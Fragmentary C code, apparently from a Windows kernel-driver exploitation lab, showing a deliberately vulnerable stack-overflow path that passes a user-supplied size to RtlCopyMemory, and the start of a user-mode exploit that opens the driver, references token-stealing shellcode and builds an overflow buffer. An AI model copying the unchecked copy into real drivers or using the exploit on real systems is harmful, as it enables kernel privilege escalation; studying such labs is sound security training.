#ifdef SECURE // Secure Note: This is secure because the developer is passing a size // equal to size of KernelBuffer to RtlCopyMemory()/memcpy(). Hence, // there will be no overflow RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, sizeof(KernelBuffer)); #else DbgPrint("[+] Triggering Stack Overflow\n");
// Vulnerability Note: This is a vanilla Stack based Overflow vulnerability // because the developer is passing the user supplied size directly to // RtlCopyMemory()/memcpy() without validating if the size is greater or // equal to the size of KernelBuffer RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, Size); #endif } __except (EXCEPTION_EXECUTE_HANDLER) { Status = GetExceptionCode(); DbgPrint("[-] Exception Code: 0x%X\n", Status); }
printf("Getting the device handle\r\n"); HANDLE hDriver = CreateFileA(lpDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, NULL); if (hDriver == INVALID_HANDLE_VALUE) { printf("Failed to get device handle : (0x%X\r\n)", GetLastError()); return1; }
printf("Got the device Handle : 0x%X\r\n", hDriver); printf("Allocating Memory For Input Buffer\r\n"); /* lpInBuffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, nInBufferSize); if (!lpInBuffer) { printf("HeapAlloc failed :(0x%X\r\n)",GetLastError()); return 1; } printf("Input buffer allocated as 0x%X bytes.\r\n",nInBufferSize); printf("Input buffer address : 0x%p\r\n",lpInBuffer); printf("Filling buffer with A's\r\n"); */
//RtlFillMemory((PVOID)lpInBuffer, nInBufferSize, 0x41); printf("\t[*]Payload is at : %p\n", TokenStealingShellcodeWin); //junk's length is 2080 CHAR *chBuffer = (CHAR*)malloc(2084); printf("\t[*]Buffer is at : %p\n", &chBuffer);